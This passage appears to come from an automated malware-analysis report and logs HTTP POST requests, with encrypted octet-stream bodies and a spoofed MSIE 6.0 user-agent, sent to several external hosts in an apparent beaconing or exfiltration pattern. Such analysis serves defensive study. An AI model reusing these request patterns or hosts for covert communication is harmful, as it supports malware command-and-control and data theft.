51 62 5a 7a 42 45 32 38 57 67 61 43 59 4c 48 57 35 6a 42 42 54 44 6e 76 52 4d 77 44 38 46 6a 6b 70 5a 70 76 70 34 39 66 2f 34 7a 68 66 4d 6c 77 50 76 63 51 56 6c 5a 64 4e 52 44 56 54 4b 42 4d 45 6d 36 4f 55 52 77 47 54 2b 56 79 4c 6f 4c 35 4d 35 51 50 2f 49 68 59 6b 53 41 59 57 48 4a 6d 66 62 7a 44 6c 6a 54 31 35 68 61 68 2b 2f 73 43 65 6e 72 35 78 6e 72 69 4b 46 32 48 45 61 34 73 4b 75 78 6f 33 2f 4a 79 71 64 4d 65 2b 2b 2f 66 6b 7a 79 4d 41 31 6c 6e 54 68 48 75 67 2f 6e 6a 4a 78 59 46 39 63 45 43 64 73 33 55 4a 70 66 77 6b 55 43 78 41 56 4b 51 2b 2b 53 45 74 53 51 39 48 44 62 4d 4c 54 4d 58 6c 68 7a 5a 6b 4d 51 2b 45 68 53 39 61 4b 62 77 65 6a 68 7a 57 65 76 55 55 4f 31 4b 35 68 46 41 35 7a 68 74 2b 55 34 50 70 49 54 30 59 46 58 43 31 61 65 79 7a 4c 70 68 42 56 4d 72 42 44 61 31 73 5a 78 49 41 78 59 2b 61 72 6b 32 36 57 30 6e 7a 63 77 4d 71 39 78 56 2f 6b 57 35 4f 67 50 63 65 62 58 45 48 4c 39 43 62 43 4b 4b 74 6a 4b 53 37 32 73 33 31 78 6d 65 37 58 4c 79 72 2b 61 61 77 41 7a 41 6c 43 4b 2b 79 75 33 57 4e 2b 6f 4e 42 2f 66 44 38 4e 33 42 49 43 4e 6c 2f 65 50 4e 39 61 50 2b 74 55 34 32 4a 68 4e 46 55 74 37 41 56 4e 38 69 38 50 6b 44 44 76 68 2b 42 4f 55 64 38 42 56 55 32 76 6c 37 70 48 4c 79 51 63 5a 6a 39 6b 74 5a 49 63 74 4b 72 6a 39 69 51 76 55 44 47 57 35 6f 67 4f 69 46 35 45 66 32 74 75 41 3d 3d Data Ascii: nbbSsca2DRjfidpW4R9Kxen7XNsmfGLTWidABNeD/LUm4iDKP2CPFlPQYXtrDZxXHIOPIe4o8lasVpLre/FMVSkMmWSeZnp4WC+BiFpKYlx/0//quP/D/Su9DF4cesSPA9p03JraI8xS+RYQbZzBE28WgaCYLHW5jBBTDnvRMwD8FjkpZpvp49f/4zhfMlwPvcQVlZdNRDVTKBMEm6OURwGT+VyLoL5M5QP/IhYkSAYWHJmfbzDljT15hah+/sCenr5xnriKF2HEa4sKuxo3/JyqdMe++/fkzyMA1lnThHug/njJxYF9cECds3UJpfwkUCxAVKQ++SEtSQ9HDbMLTMXlhzZkMQ+EhS9aKbwejhzWevUUO1K5hFA5zht+U4PpIT0YFXC1aeyzLphBVMrBDa1sZxIAxY+ark26W0nzcwMq9xV/kW5OgPcebXEHL9CbCKKtjKS72s31xme7XLyr+aawAzAlCK+yu3WN+oNB/fD8N3BICNl/ePN9aP+tU42JhNFUt7AVN8i8PkDDvh+BOUd8BVU2vl7pHLyQcZj9ktZIctKrj9iQvUDGW5ogOiF5Ef2tuA==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 55 36 73 4c 6c 2f 52 47 34 78 66 64 76 38 31 61 54 38 55 53 37 30 65 79 4f 53 76 73 6f 6d 36 68 61 41 73 4f 5a 53 57 63 54 6b 42 59 46 36 30 49 4d 38 32 7a 41 58 77 78 77 7a 45 32 4d 6f 51 55 41 35 57 72 6b 62 63 6e 47 6c 43 6b 6d 76 72 46 37 59 7a 4e 5a 6c 4d 53 66 44 4e 61 72 52 4c 36 46 76 4b 64 57 4f 59 6a 6f 50 53 34 75 6f 37 55 2b 36 56 62 68 4f 48 6e 76 67 4c 6a 6f 56 45 41 49 48 4f 77 64 41 43 6b 74 6a 32 4c 4e 62 4f 44 4c 63 32 32 4d 5a 38 34 65 5a 76 49 30 33 34 61 72 6b 57 4e 72 44 32 44 45 73 68 4f 6c 69 32 34 37 57 4c 41 71 37 49 74 73 6c 71 56 62 57 45 4e 64 66 53 62 35 75 4f 68 53 2b 49 79 59 62 53 72 4a 51 69 46 6c 41 42 64 70 4d 2b 71 61 7a 6d 32 62 79 49 7a 74 52 2f 69 69 6d 46 49 63 52 61 42 2f 72 2b 49 50 42 64 54 62 79 76 2f 58 72 39 33 35 34 32 33 4a 52 42 43 6c 56 67 6d 76 62 6a 56 63 69 79 77 4e 37 68 47 39 67 56 6f 68 36 73 36 54 68 72 70 45 62 74 76 5a 2f 51 6c 75 6e 42 53 65 47 67 51 59 42 6e 49 73 57 32 36 4a 77 56 44 44 65 74 6f 57 47 47 64 65 49 41 42 31 47 59 66 6d 53 72 47 49 5a 33 37 79 46 77 36 6d 4a 75 48 59 45 6b 42 62 4e 35 2b 51 65 2f 36 6d 57 5a 56 72 2f 4a 75 33 79 33 34 46 76 64 65 51 6a 53 6b 76 7a 55 6a 4e 45 54 35 4f 41 47 69 56 4f 48 70 52 72 2f 36 64 4a 58 39 31 4e 61 33 59 4b 52 56 56 2f 37 5a 70 4e 2b 41 6b 7a 7a 44 58 38 32 49 78 50 68 32 44 38 51 39 6f 78 72 37 73 75 46 59 75 59 32 42 73 65 4c 4b 64 39 2f 6d 61 56 79 69 6e 47 55 69 6e 62 70 70 42 71 43 5a 63 63 6c 36 2f 63 4f 4a 63 44 69 37 4a 38 4a 33 78 51 79 4e 61 6e 35 6b 34 67 65 47 4c 46 4d 7a 35 70 33 71 48 4b 33 37 64 45 36 75 43 46 44 6a 7a 59 34 53 52 50 38 4c 62 59 58 61 6a 63 35 35 35 51 34 67 44 39 77 72 47 4b 78 5a 64 41 3d 3d Data Ascii: U6sLl/RG4xfdv81aT8US70eyOSvsom6haAsOZSWcTkBYF60IM82zAXwxwzE2MoQUA5WrkbcnGlCkmvrF7YzNZlMSfDNarRL6FvKdWOYjoPS4uo7U+6VbhOHnvgLjoVEAIHOwdACktj2LNbODLc22MZ84eZvI034arkWNrD2DEshOli247WLAq7ItslqVbWENdfSb5uOhS+IyYbSrJQiFlABdpM+qazm2byIztR/iimFIcRaB/r+IPBdTbyv/Xr935423JRBClVgmvbjVciywN7hG9gVoh6s6ThrpEbtvZ/QlunBSeGgQYBnIsW26JwVDDetoWGGdeIAB1GYfmSrGIZ37yFw6mJuHYEkBbN5+Qe/6mWZVr/Ju3y34FvdeQjSkvzUjNET5OAGiVOHpRr/6dJX91Na3YKRVV/7ZpN+AkzzDX82IxPh2D8Q9oxr7suFYuY2BseLKd9/maVyinGUinbppBqCZccl6/cOJcDi7J8J3xQyNan5k4geGLFMz5p3qHK37dE6uCFDjzY4SRP8LbYXajc555Q4gD9wrGKxZdA==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 6e 62 62 53 73 63 61 32 44 52 6a 66 69 64 70 57 34 52 39 4b 78 65 6e 37 58 4e 73 6d 66 47 4c 54 57 69 64 41 42 4e 65 44 2f 4c 55 6d 34 69 44 4b 50 32 43 50 46 6c 50 51 59 58 74 72 44 5a 78 58 48 49 4f 50 49 65 34 6f 38 6c 61 73 56 70 4c 72 65 2f 46 4d 56 53 6b 4d 6d 57 53 65 5a 6e 70 34 57 43 2b 42 69 46 70 4b 59 6c 78 2f 30 2f 2f 71 75 50 2f 44 2f 53 75 39 44 46 34 63 65 73 53 50 41 39 70 30 33 4a 72 61 49 38 78 53 2b 52 59 51 62 5a 7a 42 45 32 38 57 67 61 43 59 4c 48 57 35 6a 42 42 54 44 6e 76 52 4d 77 44 38 46 6a 6b 70 5a 70 76 70 34 39 66 2f 34 7a 68 66 4d 6c 77 50 76 63 51 56 6c 5a 64 4e 52 44 56 54 4b 42 4d 45 6d 36 4f 55 52 77 47 54 2b 56 79 4c 6f 4c 35 4d 35 51 50 2f 49 68 59 6b 53 41 59 57 48 4a 6d 66 62 7a 44 6c 6a 54 31 35 68 61 68 2b 2f 73 43 65 6e 72 35 78 6e 72 69 4b 46 32 48 45 61 34 73 4b 75 78 6f 33 2f 4a 79 71 64 4d 65 2b 2b 2f 66 6b 7a 79 4d 41 31 6c 6e 54 68 48 75 67 2f 6e 6a 4a 78 59 46 39 63 45 43 64 73 33 55 4a 70 66 77 6b 55 43 78 41 56 4b 51 2b 2b 53 45 74 53 51 39 48 44 62 4d 4c 54 4d 58 6c 68 7a 5a 6b 4d 51 2b 45 68 53 39 61 4b 62 77 65 6a 68 7a 57 65 76 55 55 4f 31 4b 35 68 46 41 35 7a 68 74 2b 55 34 50 70 49 54 30 59 46 58 43 31 61 65 79 7a 4c 70 68 42 56 4d 72 42 44 61 31 73 5a 78 49 41 78 59 2b 61 72 6b 32 36 57 30 6e 7a 63 77 4d 71 39 78 56 2f 6b 57 35 4f 67 50 63 65 62 58 45 48 4c 39 43 62 43 4b 4b 74 6a 4b 53 37 32 73 33 31 78 6d 65 37 58 4c 79 72 2b 61 61 77 41 7a 41 6c 43 4b 2b 79 75 33 57 4e 2b 6f 4e 42 2f 66 44 38 4e 33 42 49 43 4e 6c 2f 65 50 4e 39 61 50 2b 74 55 34 32 4a 68 4e 46 55 74 37 41 56 4e 38 69 38 50 6b 44 44 76 68 2b 42 4f 55 64 38 42 56 55 32 76 6c 37 70 48 4c 79 51 63 5a 6a 39 6b 74 5a 49 63 74 4b 72 6a 39 69 51 76 55 44 47 57 35 6f 67 4f 69 46 35 45 66 32 74 75 41 3d 3d Data Ascii: nbbSsca2DRjfidpW4R9Kxen7XNsmfGLTWidABNeD/LUm4iDKP2CPFlPQYXtrDZxXHIOPIe4o8lasVpLre/FMVSkMmWSeZnp4WC+BiFpKYlx/0//quP/D/Su9DF4cesSPA9p03JraI8xS+RYQbZzBE28WgaCYLHW5jBBTDnvRMwD8FjkpZpvp49f/4zhfMlwPvcQVlZdNRDVTKBMEm6OURwGT+VyLoL5M5QP/IhYkSAYWHJmfbzDljT15hah+/sCenr5xnriKF2HEa4sKuxo3/JyqdMe++/fkzyMA1lnThHug/njJxYF9cECds3UJpfwkUCxAVKQ++SEtSQ9HDbMLTMXlhzZkMQ+EhS9aKbwejhzWevUUO1K5hFA5zht+U4PpIT0YFXC1aeyzLphBVMrBDa1sZxIAxY+ark26W0nzcwMq9xV/kW5OgPcebXEHL9CbCKKtjKS72s31xme7XLyr+aawAzAlCK+yu3WN+oNB/fD8N3BICNl/ePN9aP+tU42JhNFUt7AVN8i8PkDDvh+BOUd8BVU2vl7pHLyQcZj9ktZIctKrj9iQvUDGW5ogOiF5Ef2tuA==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 42 32 6f 75 54 4b 6e 72 54 42 67 41 6f 4b 30 55 65 45 43 39 49 63 4a 31 77 4c 4a 48 30 76 65 78 37 65 67 52 4b 38 6a 6d 47 50 62 76 51 65 2f 2b 6a 73 31 31 49 65 2f 33 79 6e 79 61 68 73 30 45 77 6e 43 53 32 5a 32 46 50 76 64 4b 61 73 4c 59 2f 57 58 2b 75 32 4b 36 36 4d 62 48 4b 6f 67 32 77 7a 53 69 52 6f 66 32 4f 48 4a 57 72 73 56 4f 44 65 4e 50 4d 39 68 38 62 61 78 67 49 51 35 6e 46 6e 43 53 48 35 56 58 38 54 55 37 62 50 74 58 73 6d 52 59 52 71 47 7a 66 31 62 70 50 63 30 44 59 5a 4b 68 46 30 59 45 62 34 51 59 77 6d 67 37 65 35 37 79 73 70 45 66 35 69 66 74 78 30 37 53 4b 45 66 53 43 39 6b 49 77 70 50 6a 73 43 6f 30 39 52 4f 67 39 37 48 45 47 4c 48 57 39 54 31 56 6f 52 55 58 56 34 41 7a 75 32 46 34 54 52 30 36 61 47 2f 69 50 6d 4f 77 4d 6a 75 4a 37 36 33 37 46 32 5a 56 6d 58 6f 38 44 56 45 54 51 47 31 36 4c 4c 4c 4a 6a 4c 4a 54 67 58 6b 55 63 4d 67 56 65 52 50 4d 32 74 4c 70 38 70 64 64 58 7a 37 5a 61 45 5a 6d 2b 48 44 72 7a 32 69 76 70 42 74 72 6b 79 6d 49 4d 6c 41 6e 4d 46 57 2f 36 52 34 68 34 35 47 49 52 33 70 6c 48 59 31 33 4f 46 58 7a 36 44 52 64 4f 42 2b 46 6a 57 36 74 63 67 2f 46 48 68 72 32 4c 30 39 34 44 48 38 4a 44 2b 61 78 30 6c 37 42 2f 66 7a 54 4a 53 39 45 74 41 5a 38 6b 77 44 45 54 74 32 79 78 4d 47 34 32 78 67 32 4d 67 66 66 67 64 49 4b 7a 61 57 68 2f 36 42 79 66 47 37 74 4d 32 74 58 64 59 59 59 6d 33 58 46 58 61 55 6e 39 48 79 43 6f 70 35 74 58 36 7a 61 44 59 78 54 4e 49 4a 51 51 49 64 4d 51 47 65 51 75 69 39 64 2f 78 51 46 51 67 41 67 53 51 31 36 43 6f 49 41 4e 2f 4a 6d 49 39 41 54 56 63 2f 33 67 73 47 64 4f 57 6c 51 70 43 59 72 35 35 7a 50 7a 61 2f 4d 59 49 33 31 35 78 4d 52 4a 72 6f 37 34 61 64 56 6d 67 3d 3d Data Ascii: B2ouTKnrTBgAoK0UeEC9IcJ1wLJH0vex7egRK8jmGPbvQe/+js11Ie/3ynyahs0EwnCS2Z2FPvdKasLY/WX+u2K66MbHKog2wzSiRof2OHJWrsVODeNPM9h8baxgIQ5nFnCSH5VX8TU7bPtXsmRYRqGzf1bpPc0DYZKhF0YEb4QYwmg7e57yspEf5iftx07SKEfSC9kIwpPjsCo09ROg97HEGLHW9T1VoRUXV4Azu2F4TR06aG/iPmOwMjuJ7637F2ZVmXo8DVETQG16LLLJjLJTgXkUcMgVeRPM2tLp8pddXz7ZaEZm+HDrz2ivpBtrkymIMlAnMFW/6R4h45GIR3plHY13OFXz6DRdOB+FjW6tcg/FHhr2L094DH8JD+ax0l7B/fzTJS9EtAZ8kwDETt2yxMG42xg2MgffgdIKzaWh/6ByfG7tM2tXdYYYm3XFXaUn9HyCop5tX6zaDYxTNIJQQIdMQGeQui9d/xQFQgAgSQ16CoIAN/JmI9ATVc/3gsGdOWlQpCYr55zPza/MYI315xMRJro74adVmg==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 42 32 6f 75 54 4b 6e 72 54 42 67 41 6f 4b 30 55 65 45 43 39 49 63 4a 31 77 4c 4a 48 30 76 65 78 37 65 67 52 4b 38 6a 6d 47 50 62 76 51 65 2f 2b 6a 73 31 31 49 65 2f 33 79 6e 79 61 68 73 30 45 77 6e 43 53 32 5a 32 46 50 76 64 4b 61 73 4c 59 2f 57 58 2b 75 32 4b 36 36 4d 62 48 4b 6f 67 32 77 7a 53 69 52 6f 66 32 4f 48 4a 57 72 73 56 4f 44 65 4e 50 4d 39 68 38 62 61 78 67 49 51 35 6e 46 6e 43 53 48 35 56 58 38 54 55 37 62 50 74 58 73 6d 52 59 52 71 47 7a 66 31 62 70 50 63 30 44 59 5a 4b 68 46 30 59 45 62 34 51 59 77 6d 67 37 65 35 37 79 73 70 45 66 35 69 66 74 78 30 37 53 4b 45 66 53 43 39 6b 49 77 70 50 6a 73 43 6f 30 39 52 4f 67 39 37 48 45 47 4c 48 57 39 54 31 56 6f 52 55 58 56 34 41 7a 75 32 46 34 54 52 30 36 61 47 2f 69 50 6d 4f 77 4d 6a 75 4a 37 36 33 37 46 32 5a 56 6d 58 6f 38 44 56 45 54 51 47 31 36 4c 4c 4c 4a 6a 4c 4a 54 67 58 6b 55 63 4d 67 56 65 52 50 4d 32 74 4c 70 38 70 64 64 58 7a 37 5a 61 45 5a 6d 2b 48 44 72 7a 32 69 76 70 42 74 72 6b 79 6d 49 4d 6c 41 6e 4d 46 57 2f 36 52 34 68 34 35 47 49 52 33 70 6c 48 59 31 33 4f 46 58 7a 36 44 52 64 4f 42 2b 46 6a 57 36 74 63 67 2f 46 48 68 72 32 4c 30 39 34 44 48 38 4a 44 2b 61 78 30 6c 37 42 2f 66 7a 54 4a 53 39 45 74 41 5a 38 6b 77 44 45 54 74 32 79 78 4d 47 34 32 78 67 32 4d 67 66 66 67 64 49 4b 7a 61 57 68 2f 36 42 79 66 47 37 74 4d 32 74 58 64 59 59 59 6d 33 58 46 58 61 55 6e 39 48 79 43 6f 70 35 74 58 36 7a 61 44 59 78 54 4e 49 4a 51 51 49 64 4d 51 47 65 51 75 69 39 64 2f 78 51 46 51 67 41 67 53 51 31 36 43 6f 49 41 4e 2f 4a 6d 49 39 41 54 56 63 2f 33 67 73 47 64 4f 57 6c 51 70 43 59 72 35 35 7a 50 7a 61 2f 4d 59 49 33 31 35 78 4d 52 4a 72 6f 37 34 61 64 56 6d 67 3d 3d Data Ascii: B2ouTKnrTBgAoK0UeEC9IcJ1wLJH0vex7egRK8jmGPbvQe/+js11Ie/3ynyahs0EwnCS2Z2FPvdKasLY/WX+u2K66MbHKog2wzSiRof2OHJWrsVODeNPM9h8baxgIQ5nFnCSH5VX8TU7bPtXsmRYRqGzf1bpPc0DYZKhF0YEb4QYwmg7e57yspEf5iftx07SKEfSC9kIwpPjsCo09ROg97HEGLHW9T1VoRUXV4Azu2F4TR06aG/iPmOwMjuJ7637F2ZVmXo8DVETQG16LLLJjLJTgXkUcMgVeRPM2tLp8pddXz7ZaEZm+HDrz2ivpBtrkymIMlAnMFW/6R4h45GIR3plHY13OFXz6DRdOB+FjW6tcg/FHhr2L094DH8JD+ax0l7B/fzTJS9EtAZ8kwDETt2yxMG42xg2MgffgdIKzaWh/6ByfG7tM2tXdYYYm3XFXaUn9HyCop5tX6zaDYxTNIJQQIdMQGeQui9d/xQFQgAgSQ16CoIAN/JmI9ATVc/3gsGdOWlQpCYr55zPza/MYI315xMRJro74adVmg==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 62 68 6b 57 76 48 42 76 67 68 69 36 45 31 32 63 67 7a 78 6c 56 53 50 34 39 38 55 59 57 77 4b 46 70 43 56 59 32 2f 4b 64 62 69 2b 39 43 54 32 4b 64 70 4e 6c 44 37 74 66 61 48 73 53 36 4c 7a 50 34 6c 77 56 70 6d 51 46 31 6d 70 34 46 36 53 61 56 52 5a 66 2f 33 34 4b 6e 4e 68 63 47 62 73 36 48 6b 69 4a 50 45 4f 57 52 4f 53 78 37 38 66 4e 37 66 30 34 2f 4b 2f 70 74 48 77 6c 6e 6e 57 66 71 6f 76 65 78 53 76 64 41 30 5a 63 75 4b 37 73 6c 74 72 65 33 77 77 33 67 31 43 67 38 43 64 30 42 6a 2b 4d 32 41 69 71 36 47 4b 38 31 5a 78 32 4e 4b 79 61 6d 49 36 34 5a 36 69 57 52 75 4c 69 2f 4f 68 51 5a 56 74 76 4d 6e 42 51 50 6b 64 56 41 47 69 32 4c 51 64 46 57 62 56 78 65 36 4c 4e 70 41 6e 41 34 77 6f 55 48 61 31 73 7a 67 53 6e 59 45 72 57 4e 7a 59 37 67 46 52 64 30 5a 7a 52 71 44 79 6d 69 5a 5a 51 39 31 63 6f 52 56 78 59 33 52 74 31 47 4e 58 6d 52 4d 30 6d 34 47 55 70 65 56 6a 38 66 78 50 49 31 66 53 71 75 4a 34 61 39 6e 65 56 52 77 62 46 2f 6f 4e 4a 61 52 57 77 45 48 41 41 71 50 50 6d 32 6e 54 2b 36 37 30 74 4d 4f 39 4b 69 62 65 47 57 64 41 53 36 44 47 31 58 34 30 78 71 34 50 30 43 74 74 65 4a 69 75 42 48 59 6c 58 56 4c 65 53 77 4b 6f 42 51 65 55 2f 57 62 5a 44 61 54 4e 6c 73 61 6d 6d 52 43 4a 44 50 4c 6b 43 75 64 6c 4b 6d 36 51 71 41 53 55 57 46 31 45 4f 4f 6b 6a 35 74 50 5a 52 38 44 61 76 30 33 46 5a 48 35 50 6e 74 48 38 64 38 61 69 43 4d 74 71 69 72 56 37 75 6e 2b 45 5a 68 66 54 53 63 58 6e 48 46 74 6e 73 4d 76 73 58 32 2b 32 57 43 71 75 7a 61 30 42 71 38 70 30 6a 56 73 31 6e 67 63 5a 52 37 4f 4e 4f 66 62 4c 57 6d 31 32 70 56 31 75 74 79 2f 31 58 44 47 43 47 61 43 41 79 4f 54 72 31 2f 61 47 4d 79 39 47 37 4c 61 2b 76 Data Ascii: bhkWvHBvghi6E12cgzxlVSP498UYWwKFpCVY2/Kdbi+9CT2KdpNlD7tfaHsS6LzP4lwVpmQF1mp4F6SaVRZf/34KnNhcGbs6HkiJPEOWROSx78fN7f04/K/ptHwlnnWfqovexSvdA0ZcuK7sltre3ww3g1Cg8Cd0Bj+M2Aiq6GK81Zx2NKyamI64Z6iWRuLi/OhQZVtvMnBQPkdVAGi2LQdFWbVxe6LNpAnA4woUHa1szgSnYErWNzY7gFRd0ZzRqDymiZZQ91coRVxY3Rt1GNXmRM0m4GUpeVj8fxPI1fSquJ4a9neVRwbF/oNJaRWwEHAAqPPm2nT+670tMO9KibeGWdAS6DG1X40xq4P0CtteJiuBHYlXVLeSwKoBQeU/WbZDaTNlsammRCJDPLkCudlKm6QqASUWF1EOOkj5tPZR8Dav03FZH5PntH8d8aiCMtqirV7un+EZhfTScXnHFtnsMvsX2+2WCquza0Bq8p0jVs1ngcZR7ONOfbLWm12pV1uty/1XDGCGaCAyOTr1/aGMy9G7La+v
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 62 4b 70 38 58 42 43 34 38 78 67 43 7a 76 50 74 6f 36 79 31 6c 63 4e 70 32 67 6b 34 30 47 64 4a 52 4b 43 72 52 7a 4f 44 46 45 42 54 63 48 55 36 43 56 6d 50 77 45 45 44 6d 6e 33 33 79 30 6d 45 6a 61 75 51 65 2b 34 52 77 48 72 4f 68 6b 77 4d 4b 67 46 47 66 36 31 46 49 2f 63 67 67 65 77 6a 2f 4a 72 36 5a 5a 47 35 62 4b 50 77 5a 56 68 4c 56 47 5a 61 48 74 32 78 58 62 70 78 6e 2b 30 6a 35 4e 54 31 51 64 47 54 62 6a 44 4f 69 63 70 57 59 6a 4a 50 51 4f 47 46 79 33 2f 62 30 39 4c 44 52 4d 72 51 6c 39 76 35 62 67 77 68 59 4f 6a 76 4d 70 78 52 64 4a 4d 6e 37 69 79 36 48 6f 59 56 48 51 46 73 68 4a 66 31 74 6d 75 37 37 42 37 4c 51 61 41 65 6f 4e 55 53 39 6c 78 56 4a 64 75 79 46 6a 35 65 6f 67 4a 79 6a 5a 35 6b 6c 32 2f 39 35 74 46 62 59 75 36 79 62 6a 63 36 68 4a 33 36 54 58 75 61 68 61 74 6c 73 52 30 63 32 6b 45 38 66 2f 54 73 54 68 74 42 77 44 6f 64 4b 72 4e 78 34 39 57 48 4a 77 74 52 2f 65 6a 34 74 78 6f 72 35 69 6c 53 4d 61 37 4b 4e 41 4e 58 49 35 2b 49 6d 35 71 49 79 33 4c 61 4f 31 70 7a 33 63 57 68 65 6f 64 52 44 4c 56 54 77 2b 2b 65 2b 7a 79 63 47 7a 57 53 49 58 48 2b 77 6b 4e 73 76 68 51 4a 70 4a 58 64 39 57 4c 74 30 6c 38 4b 73 32 6e 36 51 69 6f 51 54 55 30 44 30 51 35 32 36 53 52 59 76 38 69 2f 77 64 55 46 2b 48 73 51 72 66 76 4d 33 65 42 74 35 74 75 77 46 79 71 4d 4e 67 57 78 70 51 4a 65 46 6a 4a 5a 51 52 53 44 53 6c 53 4c 4c 6e 70 47 61 71 34 2f 37 74 6e 78 4e 52 67 65 72 79 31 52 65 49 66 34 42 58 47 74 46 58 4c 67 35 77 48 49 4d 79 63 51 6c 61 30 38 45 4b 6e 42 68 45 76 4f 74 2b 6d 46 30 42 63 63 62 78 37 58 61 34 4d 66 65 64 45 78 76 76 6f 38 66 4c 52 46 53 6c 68 43 64 48 65 32 34 59 67 6e 67 4b 73 69 51 41 3d 3d Data Ascii: bKp8XBC48xgCzvPto6y1lcNp2gk40GdJRKCrRzODFEBTcHU6CVmPwEEDmn33y0mEjauQe+4RwHrOhkwMKgFGf61FI/cggewj/Jr6ZZG5bKPwZVhLVGZaHt2xXbpxn+0j5NT1QdGTbjDOicpWYjJPQOGFy3/b09LDRMrQl9v5bgwhYOjvMpxRdJMn7iy6HoYVHQFshJf1tmu77B7LQaAeoNUS9lxVJduyFj5eogJyjZ5kl2/95tFbYu6ybjc6hJ36TXuahatlsR0c2kE8f/TsThtBwDodKrNx49WHJwtR/ej4txor5ilSMa7KNANXI5+Im5qIy3LaO1pz3cWheodRDLVTw++e+zycGzWSIXH+wkNsvhQJpJXd9WLt0l8Ks2n6QioQTU0D0Q526SRYv8i/wdUF+HsQrfvM3eBt5tuwFyqMNgWxpQJeFjJZQRSDSlSLLnpGaq4/7tnxNRgery1ReIf4BXGtFXLg5wHIMycQla08EKnBhEvOt+mF0Bccbx7Xa4MfedExvvo8fLRFSlhCdHe24YgngKsiQA==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 62 68 6b 57 76 48 42 76 67 68 69 36 45 31 32 63 67 7a 78 6c 56 53 50 34 39 38 55 59 57 77 4b 46 70 43 56 59 32 2f 4b 64 62 69 2b 39 43 54 32 4b 64 70 4e 6c 44 37 74 66 61 48 73 53 36 4c 7a 50 34 6c 77 56 70 6d 51 46 31 6d 70 34 46 36 53 61 56 52 5a 66 2f 33 34 4b 6e 4e 68 63 47 62 73 36 48 6b 69 4a 50 45 4f 57 52 4f 53 78 37 38 66 4e 37 66 30 34 2f 4b 2f 70 74 48 77 6c 6e 6e 57 66 71 6f 76 65 78 53 76 64 41 30 5a 63 75 4b 37 73 6c 74 72 65 33 77 77 33 67 31 43 67 38 43 64 30 42 6a 2b 4d 32 41 69 71 36 47 4b 38 31 5a 78 32 4e 4b 79 61 6d 49 36 34 5a 36 69 57 52 75 4c 69 2f 4f 68 51 5a 56 74 76 4d 6e 42 51 50 6b 64 56 41 47 69 32 4c 51 64 46 57 62 56 78 65 36 4c 4e 70 41 6e 41 34 77 6f 55 48 61 31 73 7a 67 53 6e 59 45 72 57 4e 7a 59 37 67 46 52 64 30 5a 7a 52 71 44 79 6d 69 5a 5a 51 39 31 63 6f 52 56 78 59 33 52 74 31 47 4e 58 6d 52 4d 30 6d 34 47 55 70 65 56 6a 38 66 78 50 49 31 66 53 71 75 4a 34 61 39 6e 65 56 52 77 62 46 2f 6f 4e 4a 61 52 57 77 45 48 41 41 71 50 50 6d 32 6e 54 2b 36 37 30 74 4d 4f 39 4b 69 62 65 47 57 64 41 53 36 44 47 31 58 34 30 78 71 34 50 30 43 74 74 65 4a 69 75 42 48 59 6c 58 56 4c 65 53 77 4b 6f 42 51 65 55 2f 57 62 5a 44 61 54 4e 6c 73 61 6d 6d 52 43 4a 44 50 4c 6b 43 75 64 6c 4b 6d 36 51 71 41 53 55 57 46 31 45 4f 4f 6b 6a 35 74 50 5a 52 38 44 61 76 30 33 46 5a 48 35 50 6e 74 48 38 64 38 61 69 43 4d 74 71 69 72 56 37 75 6e 2b 45 5a 68 66 54 53 63 58 6e 48 46 74 6e 73 4d 76 73 58 32 2b 32 57 43 71 75 7a 61 30 42 71 38 70 30 6a 56 73 31 6e 67 63 5a 52 37 4f 4e 4f 66 62 4c 57 6d 31 32 70 56 31 75 74 79 2f 31 58 44 47 43 47 61 43 41 79 4f 54 72 31 2f 61 47 4d 79 39 47 37 4c 61 2b 76 Data Ascii: bhkWvHBvghi6E12cgzxlVSP498UYWwKFpCVY2/Kdbi+9CT2KdpNlD7tfaHsS6LzP4lwVpmQF1mp4F6SaVRZf/34KnNhcGbs6HkiJPEOWROSx78fN7f04/K/ptHwlnnWfqovexSvdA0ZcuK7sltre3ww3g1Cg8Cd0Bj+M2Aiq6GK81Zx2NKyamI64Z6iWRuLi/OhQZVtvMnBQPkdVAGi2LQdFWbVxe6LNpAnA4woUHa1szgSnYErWNzY7gFRd0ZzRqDymiZZQ91coRVxY3Rt1GNXmRM0m4GUpeVj8fxPI1fSquJ4a9neVRwbF/oNJaRWwEHAAqPPm2nT+670tMO9KibeGWdAS6DG1X40xq4P0CtteJiuBHYlXVLeSwKoBQeU/WbZDaTNlsammRCJDPLkCudlKm6QqASUWF1EOOkj5tPZR8Dav03FZH5PntH8d8aiCMtqirV7un+EZhfTScXnHFtnsMvsX2+2WCquza0Bq8p0jVs1ngcZR7ONOfbLWm12pV1uty/1XDGCGaCAyOTr1/aGMy9G7La+v
